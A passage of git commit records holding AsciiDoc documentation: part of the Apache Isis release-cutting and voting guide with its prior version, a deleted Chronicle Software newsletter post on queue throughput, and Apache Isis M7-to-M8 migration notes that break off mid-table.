directory):\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd ..\/isis\n\nsh preview.sh\n----\n\n* Copy the generated Antora site to the `isis-site` repo's `content` directory:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncp -Rf antora\/target\/site\/* ..\/isis-site\/content\/.\n----\n\n* Back in the `isis-site` repo, commit the changes and preview:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd ..\/isis-site\n\ngit add .\ngit commit -m \"$ISISJIRA : staging changes to website\"\n\nsh preview.sh\n----\n\n* If happy, then push the changes:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit push origin asf-staging -u\n----\n\nWait a minute or two; the site should be available at link:https:\/\/isis.staged.apache.org[] (nb: 'staged', not 'staging').\n\n\n\n== Voting\n\nOnce the artifacts have been uploaded, you can call a vote.\n\nIn all cases, votes last for 72 hours and require at least three binding +1 votes from PMC members.\n\n\n=== Start voting thread on dev mailing list\n\nThat is, link:mailto:dev@isis.apache.org[]\n\nThe following boilerplate is for a release of the Apache Isis Core.\nAdapt as required:\n\nUse the following subject, eg:\n\n[source,subs=\"attributes+\"]\n----\n[VOTE] Apache Isis Core release {page-isisrel} RC1\n----\n\nAnd use the following body:\n\n[source,subs=\"attributes+\"]\n----\nI've just cut a new release of the Apache Isis Framework.\n\nThe source code zip artifact has been uploaded to a staging repository
on\nhttps:\/\/repository.apache.org, along with its corresponding .asc signature.\n\nIn the source code repo the code has been tagged as isis-{page-isisrel}-RC1;\nsee https:\/\/github.com\/apache\/isis\/tags\n\nTo verify the source code itself, you can use the following commands\n(in an empty directory):\n\n----------------------------------------------------------------\ninclude::partial$verify-process.adoc[]\n----------------------------------------------------------------\n\nYou can then test the helloworld or simpleapp starter apps, see:\nhttps:\/\/isis.staged.apache.org\/comguide\/latest\/verifying-releases.html.\n\nYou can also inspect the website in general, available at:\nhttps:\/\/isis.staged.apache.org.\n\nPlease verify the release and cast your vote.\nThe vote will be open for a minimum of 72 hours.\n\n[ ] +1\n[ ] 0\n[ ] -1\n----\n\nRemember to update:\n\n* the version number (`{page-isisrel}` or whatever)\n* the release candidate number (`RC1` or whatever)\n* the `NEXUSREPONUM` to the repository id as provided by Nexus earlier (`11xx` or whatever)\n\nNote that the email also references the procedure for other committers to xref:comguide:ROOT:verifying-releases.adoc[verify the release].\n\n\n\n\n","old_contents":"= Cutting a Release\n\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the License for the specific language governing permissions and limitations under the License.\n:page-partial:\n\n\nThe release process consists of:\n\n* the release manager cutting the release (documented below)\n* Members of the Apache Isis PMC xref:comguide:ROOT:verifying-releases.adoc[verifying] and voting on the release\n* the release manager performing post-release tasks, for either a xref:comguide:ROOT:post-release-successful.adoc[successful] or an xref:comguide:ROOT:post-release-unsuccessful.adoc[unsuccessful] vote.\n\nApache Isis itself is released in one go, everything is ultimately a child of `isis-parent\/pom.xml` (relative to the link:https:\/\/github.com\/apache\/isis[source code root]).\nThis section details the process for formally releasing this module.\n\nThe subsequent sections describe how other committers can xref:comguide:ROOT:verifying-releases.adoc[verify a release] and how the release manager can then perform xref:comguide:ROOT:post-release-successful.adoc[post-release] activities and set up for the next development iteration.\n\nIf you've not performed a release before, then note that there are some configuration xref:comguide:ROOT:release-process-prereqs.adoc[prerequisites] that must be configured first.\nIn particular, you'll need signed public\/private keys, and the ASF Nexus staging repo inlocal `~\/.m2\/settings.xml` file.\n\nThese release notes using bash command line tools.\nThey should work on Linux and MacOS; for Windows, use mSysGit.\n\n\n== Preparation\n\n=== Obtain Consensus\n\nBefore releasing the framework, ensure there is consensus on the xref:docs:support:mailing-list.adoc[dev mailing list] that this is the right time for a release.\nThe discussion should include confirming the version number to be used, and to confirm content.\n\nThese discussions should also confirm the version number of the module being released.\nThis should be in line with our xref:comguide:ROOT:policies\/versioning-policy.adoc#semantic-versioning[semantic versioning policy].\n\nMake sure you have a JIRA ticket open against which to perform all commits.\nIn most cases a JIRA ticket will have been created at the beginning of the previous release cycle.\n\n\n=== Pull down code to release\n\nSet the HEAD of your local git repo to the commit to be released.\nThis will usually be the tip of the origin's `master` branch:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit checkout master\ngit pull --ff-only\n----\n\n\n=== License headers\n\nThe Apache Release Audit Tool `RAT` (from the http:\/\/creadur.apache.org[Apache Creadur] project) checks for missing license header files.\nThe parent `pom.xml` of each releasable module specifies the RAT Maven plugin, with a number of custom exclusions.\n\nTo run the RAT tool, use:\n\n[source,bash,subs=\"attributes+\"]\n.find unapproved\/missing licenses\n----\nmvn clean\n\npushd isis-parent\nmvn org.apache.rat:apache-rat-plugin:check -D rat.numUnapprovedLicenses=1000 -Dreleased -P'!all'\npopd\n\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!???' $a; done > \/tmp\/rat-qn.txt\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!AL' $a; done > \/tmp\/rat-al.txt\n----\n\nNOTE: the parent `pom.xml` in each of these locations has the `apache-rat-plugin` appropriately configured.\n\nThis script runs over all submodules, including non-released modules.\n\nThe command writes out a `target\\rat.txt` for each submodule. 
missing license notes are indicated using the key `!???`.\nThe `for` command collates all the errors.\n\nInvestigate and fix any reported violations, typically by either:\n\n* adding genuinely missing license headers from Java (or other) source files, or\n* updating the `<excludes>` element for the `apache-rat-plugin` plugin to ignore test files, log files and any other non-source code files\n* also look to remove any stale `<exclude>` entries\n\nOnce you've fixed all issues, run the script again to confirm that all license violations have been fixed.\n\n=== Missing License Check\n\nAlthough Apache Isis has no dependencies on artifacts with incompatible licenses, the POMs for some of these dependencies (in the Maven central repo) do not necessarily contain the required license information.\nWithout appropriate additional configuration, this would result in the generated `DEPENDENCIES` file and generated Maven site indicating dependencies as having \"unknown\" licenses.\n\nFortunately, Maven allows the missing information to be provided by configuring the `maven-remote-resources-plugin`.\nThis is stored in the `src\/main\/appended-resources\/supplemental-models.xml` file, relative to the root of each releasable module.\n\nIt's first necessary to have built the framework locally at least once:\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn clean install -o\n----\n\nOnce this is done, capture the missing license information using:\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn license:download-licenses\ngroovy scripts\/checkmissinglicenses.groovy\n----\n\nWARNING: this groovy script assumes it is being run from the `isis-parent` directory.\n\nThe Maven plugin creates a `license.xml` file in the `target\/generated-resources` directory of each module.\nThe script then searches for these `licenses.xml` files, and compares them against the contents of the `supplemental-models.xml` file.\n\nFor example, the output could be something like:\n\n[source,bash,subs=\"attributes+\"]\n----\nlicenses to add to supplemental-models.xml:\n\n[org.slf4j, slf4j-api, 1.5.7]\n[org.codehaus.groovy, groovy-all, 1.7.2]\n\nlicenses to remove from supplemental-models.xml (are spurious):\n\n[org.slf4j, slf4j-api, 1.5.2]\n----\n\nIf any missing entries are listed or are spurious, then update `supplemental-models.xml` and try again.\n\n\n=== Update and preview website\n\nGenerate the website, ensuring that the config, examples, projdoc (system overview and global index) are all updated:\n\n[source,bash,subs=\"attributes+\"]\n----\nsh preview.sh\n----\n\nCheck for any Asciidoc errors, and fix.\n\n\n=== Commit changes\n\nCommit any changes from the preceding steps:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit add ..\ngit commit -m \"$ISISJIRA: updates to pom.xml etc for release\"\n----\n\n\n== Releasing the Framework\n\n=== Set environment variables\n\nWe use environment variables to parameterize as many of the steps as possible.\nFor example:\n\n[source,bash,subs=\"attributes+\"]\n----\nexport ISISJIRA=ISIS-9999 # <.>\nexport ISISTMP=\/c\/tmp # <.>\nexport ISISREL={page-isisrel} # <.>\nexport ISISRC=RC1 # <.>\nexport ISISBRANCH=release-$ISISREL-$ISISRC\nexport ISISART=isis\nenv | grep ISIS | sort\n----\n<.> set to an \"umbrella\" ticket for all release activities.\n(One should exist already, xref:comguide:ROOT:post-release-successful.adoc#create-new-jira[created at] the beginning of the development cycle now completing).\n<.> adjust by platform\n<.> adjust as required\n<.> adjust as necessary if this is not the 
first attempt to release\n\n\n[IMPORTANT]\n====\nThe branch name is intentionally *not* the same as the eventual tag names (eg `isis-{page-isisrel}`).\n====\n\n\n=== Create a release branch and worktree\n\nThe release is performed on a branch; if we are successful, this branch will be merged back into master.\n\nWe also recommend performing this work in a separate git worktree.\nThe original worktree can stay with the `master` branch and be used for documentation fixes, etc.\n\n* create (but don't checkout) a release branch for the version number being released; eg:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit branch $ISISBRANCH\n----\n\n* Create a worktree for this branch:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit worktree add ..\/isis-release $ISISBRANCH\n----\n\n* Switch to the new worktree and push the branch:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd ..\/isis-release\ngit push origin $ISISBRANCH -u\n----\n\n* Finally switch to the `isis-parent` directory:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd isis-parent\n----\n\n=== Bump code to `$ISISREL`\n\nSearch through the `.java` files for `{page-isisprev}`, and change to `{page-isisrel}`.\n\n=== Bump projects to `$ISISREL`\n\nWe use `mvn versions:set` to manually bump the release version:\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn versions:set -DnewVersion=$ISISREL\nmvn install -o -DskipTests\n\npushd ..\/starters\nmvn versions:set -DnewVersion=$ISISREL\npopd\n\ngit add ..\ngit commit -m \"$ISISJIRA: bumps version to $ISISREL\"\n----\n\nNOTE: After release, there is a xref:comguide:ROOT:cutting-a-release.adoc#reset-revision-property[similar step at the end] to reset back to `2.0.0-SNAPSHOT`.\n\n\n=== Sanity check\n\nPerform one last sanity check on the codebase.\nDelete all Isis artifacts from your local Maven repo, then build using the `-o` offline flag:\n\n[source,bash,subs=\"attributes+\"]\n----\nrm -rf ~\/.m2\/repository\/org\/apache\/isis\nmvn clean install -o -Dreleased -P'!all'\n----\n\n[NOTE]\n====\nThe `released` system property is set to only sanity check the modules actually to be released (ignores the incubator modules).\n\nPartly that's because there's no need to check the incubator modules, it's also because the incubator modules require Java 11 (Java 8 is used for everything else)\n====\n\n\n=== Deploy\n\nSince the `<version>` has already been updated, we just use `mvn deploy` to upload the artifacts.\nWe activate the (inherited) `apache-release` profile to bring in the `gpg` plugin for code signing.\n\nThe build creates a zip of the directory, so before executing the release we remove any other files.\nStill in the `isis-parent` directory:\n\n[source,bash]\n----\npushd ..\ngit clean -dfx\npopd\n----\n\nTo deploy (upload the artifacts), we use:\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn deploy \\\n -Dapache-release \\\n -Dgit\n----\n\nWhen prompted, enter your GPG passphrase.\n(Or, it might be sufficient to add just `-Dgpg.passphrase=\"...\"`)\n\nIMPORTANT: This requires `gpg` v2.1 or later.\n\n\n=== Tag the Release\n\nFinally, tag the release:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit tag $ISISART-$ISISREL\ngit tag $ISISART-$ISISREL-$ISISRC\n----\n\n\n=== Check\/Close Staging Repo\n\nThe `mvn deploy` commands will have uploaded all of the release artifacts into a newly created staging repository on the ASF Nexus repository server.\n\nLog onto http:\/\/repository.apache.org[repository.apache.org] (using your ASF LDAP 
account):\n\nimage::release-process\/nexus-staging-0.png[width=\"600px\"]\n\nAnd then check that the release has been staged (select `staging repositories` from left-hand side):\n\nimage::release-process\/nexus-staging-1.png[width=\"600px\"]\n\nIf nothing appears in a staging repo you should stop here and work out why.\n\nAssuming that the repo has been populated, make a note of its repo id; this is needed for the voting thread.\nIn the screenshot above the id is `org.apache.isis-008`.\n\nAfter checking that the staging repository contains the artifacts that you expect you should close the staging repository.\nThis will make it available so that people can check the release.\n\nPress the Close button and complete the dialog:\n\nimage::release-process\/nexus-staging-2.png[width=\"600px\"]\n\nNexus should start the process of closing the repository.\n\nimage::release-process\/nexus-staging-2a.png[width=\"600px\"]\n\nAll being well, the close should (eventually) complete successfully (keep hitting refresh):\n\nimage::release-process\/nexus-staging-3.png[width=\"600px\"]\n\nThe Nexus repository manager will also email you with confirmation of a successful close.\n\nIf Nexus has problems with the key signature, however, then the close will be aborted:\n\nimage::release-process\/nexus-staging-4.png[width=\"600px\"]\n\nUse `gpg --keyserver hkp:\/\/pgp.mit.edu --recv-keys nnnnnnnn` to confirm that the key is available.\n\n[NOTE]\n====\nUnfortunately, Nexus does not seem to allow subkeys to be used for signing.\nSee xref:comguide:ROOT:key-generation.adoc[Key Generation] for more details.\n====\n\n[#reset-revision-property]\n=== Reset `revision` property\n\nAt the beginning of the release process we bumped the version to the release version, ie `$ISISREL`.\nWith the release now deployed we now need to reset the revision back down to the base snapshot, ie `2.0.0-SNAPSHOT`.\n\n[NOTE]\n====\nPreviously we bumped to the next development snapshot.\nHowever, this approach doesn't play well with CI\/CD when Apache Isis is mounted as a git submodule, so instead we always use `2.0.0-SNAPSHOT` for all development work.\n====\n\nTherefore (still in the `isis-parent` directory):\n\n[source,bash,subs=\"attributes+\"]\n----\nmvn versions:set -DnewVersion=2.0.0-SNAPSHOT\nmvn install -DskipTests -o -Dreleased -P'!all'\n\npushd ..\/starters\nmvn versions:set -DnewVersion=2.0.0-SNAPSHOT\nmvn install -DskipTests -o\npopd\n\ngit add ..\ngit commit -m \"$ISISJIRA: resetting version\"\n----\n\n=== Push branch & tag\n\nPush the release branch to origin:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit push -u origin $ISISBRANCH\n----\n\nand also push tag:\n\n[source,bash,subs=\"attributes+\"]\n----\ngit push origin refs\/tags\/isis-$ISISREL:refs\/tags\/isis-$ISISREL-$ISISRC\ngit fetch\n----\n\n[NOTE]\n====\nThe remote tags aren't visible locally but can be seen link:https:\/\/github.com\/apache\/isis\/tags[online].\n====\n\n== Update starter apps\n\nFor each starter app, we create a new branch and make the changes there, pushing the branch back if the sanity check passes.\n\n\n* for helloworld, the steps are:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit checkout master\ngit pull --ff-only\n\ngit checkout -b $ISISBRANCH\n\nmvn versions:update-parent -DparentVersion=$ISISREL # <.>\nmvn versions:set -DnewVersion=$ISISREL\n\nmvn clean install -o\nmvn spring-boot:run\n----\n<.> requires the current parent to exist locally in `~\/.m2\/repository`.\nIf this isn't the case, then manually edit instead.\n\n* for simple app, 
the steps are almost the same:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit checkout master\ngit pull --ff-only\n\ngit checkout -b $ISISBRANCH\n\nmvn versions:update-parent -DparentVersion=$ISISREL # <.>\nmvn versions:set -DnewVersion=$ISISREL\n\nmvn clean install -Dmetamodel.lockdown\nmvn -pl webapp test -Dmavendeps.lockdown -B # <.>\n----\n<.> requires the current parent to exist locally in `~\/.m2\/repository`.\nIf this isn't the case, then manually edit instead.\n<.> the -B flag is required to avoid control characters in generated output\n+\nApprove any failed lockdown tests (the mavendeps will fail first time around because the dependencies on Apache Isis itself have just be bumped).\n+\nRepeat, then run the app as a sanity check:\n+\n[source,bash,subs=\"attributes+\"]\n----\nmvn -pl webapp spring-boot:run\n----\n+\nYou could also check the output of the Cucumber tests, under:\n\n** `webapp\/target\/cucumber-reports` and\n** `webapp\/target\/cucumber-html-reports`.\n\n* For both apps, commit any changes and then push the release branch to origin once ok:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit add .\ngit commit -m \"$ISISJIRA - updates to $ISISREL\"\ngit push -u origin $ISISBRANCH\n----\n\n== Preview website\n\nWe also prepare a preview of the next version of the website, then made accessible from link:https:\/\/isis.staged.apache.org[].\n\n* Prerequisites:\n\n** clone the link:https:\/\/github.com\/apache\/isis-site[] repo, alongside the `isis` repo:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit clone https:\/\/github.com\/apache\/isis-site ..\/isis-site\n----\n\n** in the `isis-site` repo, check out the `asf-staging` branch:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd ..\/isis-site\n\ngit checkout asf-staging\ngit pull --ff-only\n----\n\n* still in the `isis-site` repo, delete all the files in `content\/` _except_ for the `schema` and `versions` directories:\n+\n[source,bash,subs=\"attributes+\"]\n----\npushd content\nfor a in $(ls -1 | grep -v schema | grep -v versions)\ndo\n rm -rf $a\ndone\npopd\n----\n\n* Back in the `isis` repo's worktree for `master` (as opposed to the `release` worktree, that is), generate the Antora site (from the top-level directory):\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd ..\/isis\n\nsh preview.sh\n----\n\n* Copy the generated Antora site to `isis-site` repo's `contents` directory:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncp -Rf antora\/target\/site\/* ..\/isis-site\/content\/.\n----\n\n* Back in the `isis-site` repo, commit the changes and preview:\n+\n[source,bash,subs=\"attributes+\"]\n----\ncd ..\/isis-site\n\ngit add .\ngit commit -m \"$ISISJIRA : staging changes to website\"\n\nsh preview.sh\n----\n\n* If happy, then push the changes:\n+\n[source,bash,subs=\"attributes+\"]\n----\ngit push origin asf-staging -u\n----\n\nWait a minute or two; the site should be available at link:https:\/\/isis.staged.apache.org[] (nb: 'staged', not 'staging').\n\n\n\n== Voting\n\nOnce the artifacts have been uploaded, you can call a vote.\n\nIn all cases, votes last for 72 hours and require a +3 (binding) vote from members.\n\n\n=== Start voting thread on dev mailing list\n\nThat is, link:mailto:dev@apache.isis.org[]\n\nThe following boilerplate is for a release of the Apache Isis Core.\nAdapt as required:\n\nUse the following subject, eg:\n\n[source,subs=\"attributes+\"]\n----\n[VOTE] Apache Isis Core release {page-isisrel} RC1\n----\n\nAnd use the following body:\n\n[source,subs=\"attributes+\"]\n----\nI've just cut a new 
release of the Apache Isis Framework.\n\nThe source code zip artifact has been uploaded to a staging repository on\nhttps:\/\/repository.apache.org, along with its corresponding .asc signature.\n\nIn the source code repo the code has been tagged as isis-{page-isisrel}-RC1;\nsee https:\/\/github.com\/apache\/isis\/tags\n\nTo verify the source code itself, you can use the following commands\n(in an empty directory):\n\n----------------------------------------------------------------\ninclude::partial$verify-process.adoc[]\n----------------------------------------------------------------\n\nYou can then test the helloworld or simpleapp starter apps, see:\nhttps:\/\/isis.staged.apache.org\/comguide\/latest\/verifying-releases.html.\n\nYou can also inspect the website in general, available at:\nhttps:\/\/isis.staged.apache.org.\n\nPlease verify the release and cast your vote.\nThe vote will be open for a minimum of 72 hours.\n\n[ ] +1\n[ ] 0\n[ ] -1\n----\n\nRemember to update:\n\n* the version number (`{page-isisrel}` or whatever)\n* the release candidate number (`RC1` or whatever)\n* the `NEXUSREPONUM` to the repository id as provided by Nexus earlier (`11xx` or whatever)\n\nNote that the email also references the procedure for other committers to xref:comguide:ROOT:verifying-releases.adoc[verify the release].\n\n\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01979b0dd2b6a1f8affa8a9a9acfde0a8bda5d76","subject":"Delete 2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","message":"Delete 2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","new_file":"_posts\/2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","new_contents":"","old_contents":"= Publishing tens of millions of messages per second\nPeter Lawrey\n:hp-tags: Consulting, News Letter, Case Study\n\nWelcome to our first newsletter from Chronicle giving you updates on developments at Chronicle Software plus tips and case studies around how Chronicle have helped clients to maximise value from their implementation. \n\n=== Case Study\nWe have many examples where we have helped clients who are using our open source software to optimise their solution below is a recent example:-\n\nWe helped a client achieve a 12.5x throughput improvement for Chronicle Queue with minimal changes to their solution going from millions of messages per second to tens of millions of events per second.\n\nA large Petrochemical company engaged us to help with performance issues they were seeing writing market data to our Chronicle Queue. The way they were using queue with an older version was limited to about 3.5 million messages per second (per queue). Rather than use more queues they needed to improve the throughput of each one. After tuning their solution and using the last version of Chronicle Queue, they were able to achieve 8.5 million messages per second from Java. 
What they really needed was a faster, low level way to write from C++ so we produced a bespoke solution for their use case which achieved 44 million messages per second.\n\nNOTE: This was the throughput just to write the messages and didn\u2019t include their logic.\n\n=== Commercial Update\nDue to ongoing success and growth within the Chronicle business, we have grown our Commercial team recruiting 2 experienced sales and business development professionals Rob Hunt and Andrew Twigg. Rob has over 20 years experience within the financial markets, starting as a hedge fund trader he subsequently moved into software sales successfully selling to both buyside and sellside institutions. Andrew joins us from BGC where he was selling market data to financial institutions across Europe prior to that he worked in various senior sales roles within the financial markets at organisations including Thomson Reuters and Dow Jones.\n\nRob and Andrew in conjunction with Commercial Director Paul Hienkens are here to help you with any enquiries you may have around consulting or licensing our software solutions. \n\nIf you wish to discuss how our Chronicle Software experts can help you or wish to receive ongoing selected updates from Chronicle please contact us mailto:sales@chronicle-software.com[sales@chronicle-software.com]\n\nChronicle Software were founded in 2013 by Peter Lawrey the technical architect behind our software stack, as the company has grown Peter has assembled some of the best Java engineers and subject matter experts in the industry. The company\u2019s heritage is firmly rooted in financial services, our business experts and developers are renowned for their proven track records \n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"016182a4910fbdeba0915fa282d5a1ad44697e8e","subject":"ISIS-3084: mignotes for 'Remove the Notion of mutable Collections'","message":"ISIS-3084: mignotes for 'Remove the Notion of mutable Collections'","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"antora\/components\/relnotes\/modules\/ROOT\/pages\/2022\/2.0.0-M8\/mignotes.adoc","new_file":"antora\/components\/relnotes\/modules\/ROOT\/pages\/2022\/2.0.0-M8\/mignotes.adoc","new_contents":"= Migrating from M7 to M8\n\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n:page-partial:\n\n(This page will be added to as development progresses).\n\n== Programming Model\n\n[cols=\"2a,3a\", options=\"header\"]\n\n|===\n\n| previously\n| new\n\n| For _Domain Objects_ we had support for (direct) _Collection_ modification (`addTo`, `removeFrom`). 
\n\nAs this is part of _Restful Object Specification 1.0_, it was implemented for the _RO Viewer_ and also the _WrapperFactory_.\n\nSpecifically REST endpoints (removed):\n----\nDomainObjectResource\n addToSet(...)\n addToList(...)\n removeFromCollection(...)\n---- \nEvents (removed):\n----\nCollectionAddToEvent\nCollectionRemoveFromEvent\n----\n| Has been removed without replacement. (An updated _Restful Object Specification 2.0_ is in preparation.)\n\nIt has proven difficult to define what an \"execution\" would mean for _Collection_ changes, hence we finally removed that notion.\n\nIn some situations, however, it makes sense to limit which objects can be *added to* or *removed from* a _Collection_.\nThus, one would make the _Collection_ read-only and then define _Actions_ that encapsulate the required business logic.\n\n| `@DomainService.logicalTypeName` deprecated for removal\n| use `@Named` or any other semantics supported by Spring\n+\nBehavioral change: `@DomainService.logicalTypeName` can now be left empty, which is interpreted as _unspecified\/indifferent_ \n\n| `RecreatableDomainObject` interface removed\n| use `ViewModel` interface instead\n\n| `ViewModel.viewModelInit(String memento)` removed\n| use a single (String) argument constructor instead; this will allow Java Records to be used as viewmodels (future work)\n\n| `MetamodelEvent` as provided with _metamodel_ moved\n| moved to _applib_; we introduced the `MetamodelListener` _interface_, which you may use instead for convenience\n[source, java]\n.Example\n----\n@Service\npublic class SeedService implements MetamodelListener {\n\/\/..\n @Override\n public void onMetamodelLoaded() {\n \/\/ seed database entities\n }\n}\n---- \n\n| Factory method `Identifier.propertyOrCollectionIdentifier(..)`\n| was split into `Identifier.propertyIdentifier(..)` and `Identifier.collectionIdentifier(..)`\n\n|===\n\n== Commons\n\nThe following changed:\n[cols=\"2a,3a\", options=\"header\"]\n\n|===\n\n| previously\n| new\n\n| `Result<T>` removed\n| replaced by `Try<T>`; also promoting `Either<L, R>` to non-internal, \nand introducing `Railway<F, S>` \n\n|===\n\n== Configuration\n\nThe following changed:\n[cols=\"2a,3a\", options=\"header\"]\n\n|===\n\n| previously\n| new\n\n| (non-essential) object meta-data mixins were split out of `IsisModuleApplib` \n| need to be explicitly imported via `IsisModuleApplibObjectMetadataMixins`\n\n| default logging subscribers were split out of `IsisModuleApplib` \n| need to be explicitly imported via `IsisModuleApplibChangeAndExecutionLoggers`\n\n|===\n\n== Other\n\n=== Bill of Material \/ Parent POM\n\nFolder moved `\/isis-parent` -> `\/bom` \n\n[source, xml]\n.Bill of Material\n----\n<!-- renamed\n<groupId>org.apache.isis<\/groupId>\n<artifactId>isis-parent<\/artifactId>\n-->\n\n<groupId>org.apache.isis<\/groupId>\n<artifactId>isis-bom<\/artifactId>\n----\n\n=== Restclient\n\n[source, java]\n.Restclient Package Names\n----\n\/\/ renamed ...\n\/\/import org.apache.isis.extensions.restclient.RestfulClient;\n\/\/import org.apache.isis.extensions.restclient.RestfulClientConfig;\nimport org.apache.isis.viewer.restfulobjects.client.RestfulClient;\nimport org.apache.isis.viewer.restfulobjects.client.RestfulClientConfig;\n----\n\n[source, xml]\n.Restclient Artifacts\n----\n<!-- renamed\n<groupId>org.apache.isis.mappings<\/groupId>\n<artifactId>isis-mappings-restclient-applib<\/artifactId>\n-->\n\n<groupId>org.apache.isis.viewer<\/groupId>\n<artifactId>isis-viewer-restfulobjects-client<\/artifactId>\n----\n\n[source,
java]\n.Restclient Usage\n----\n\/\/ DigestResponse is no longer publicly visible, instead returning Try<T> \n<T> Try<T> digest(Response response, Class<T> entityType);\n\n\/\/ DigestResponse is no longer publicly visible, instead returning Try<Can<T>>\n<T> Try<Can<T>> digestList(Response response, Class<T> entityType, GenericType<List<T>> genericType);\n----\n\n=== Mappings\n\n[source, xml]\n.Mappings\n----\n<!-- all removed\n<groupId>org.apache.isis.mappings<\/groupId>\n<artifactId>isis-mappings-...<\/artifactId>\n-->\n----\n\n=== Mavendeps\n\n[source, xml]\n.integtests\n----\n<!-- removed\n<groupId>org.apache.isis.mavendeps<\/groupId>\n<artifactId>isis-mavendeps-integtests<\/artifactId>\n<type>pom<\/type>\n-->\n\n<!-- instead use directly as required ... -->\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-integtestsupport-applib<\/artifactId>\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-fakedata-applib<\/artifactId>\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-fixtures-applib<\/artifactId>\n----\n\n[source, xml]\n.unittests\n----\n<!-- removed\n<groupId>org.apache.isis.mavendeps<\/groupId>\n<artifactId>isis-mavendeps-unittests<\/artifactId>\n<type>pom<\/type>\n-->\n\n<!-- instead use directly as required ... -->\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-unittestsupport-applib<\/artifactId>\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-fakedata-applib<\/artifactId>\n----\n\n\n","old_contents":"= Migrating from M7 to M8\n\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the License for the specific language governing permissions and limitations under the License.\n:page-partial:\n\n(This page will be added to as development progresses).\n\n== Programming Model\n\n[cols=\"2a,3a\", options=\"header\"]\n\n|===\n\n| previously\n| new\n\n| `@DomainService.logicalTypeName` deprecated for removal\n| use `@Named` or any other semantics supported by Spring\n+\nBehavioral change: `@DomainService.logicalTypeName` can now be left empty, which is interpreted as _unspecified\/indifferent_ \n\n| `RecreatableDomainObject` interface removed\n| use `ViewModel` interface instead\n\n| `ViewModel.viewModelInit(String memento)` removed\n| use a single (String) argument constructor instead; this will allow Java Records to be used as viewmodels (future work)\n\n| `MetamodelEvent` as provided with _metamodel_ moved\n| moved to _applib_; we introduced _interface_ `MetamodelListener` for convenience to maybe use instead\n[source, java]\n.Example\n----\n@Service\npublic class SeedService implements MetamodelListener {\n\/..\n @Override\n public void onMetamodelLoaded() {\n \/\/ seed database entities\n }\n}\n---- \n\n| Factory method `Identifier.propertyOrCollectionIdentifier(..)`\n| was slit up into `Identifier.propertyIdentifier(..)` and `Identifier.collectionIdentifier(..)`\n\n|===\n\n== Commons\n\nThe following changed:\n[cols=\"2a,3a\", options=\"header\"]\n\n|===\n\n| previously\n| new\n\n| `Result<T>` removed\n| replaced by `Try<T>`; also promoting `Either<L, R>` to non-internal, \nand introducing `Railway<F, S>` \n\n|===\n\n== Configuration\n\nThe following changed:\n[cols=\"2a,3a\", options=\"header\"]\n\n|===\n\n| previously\n| new\n\n| (non-essential) object meta-data mixins were split out of `IsisModuleApplib` \n| need to be explicitly imported via `IsisModuleApplibObjectMetadataMixins`\n\n| default logging subscribers were split out of `IsisModuleApplib` \n| need to be explicitly imported via 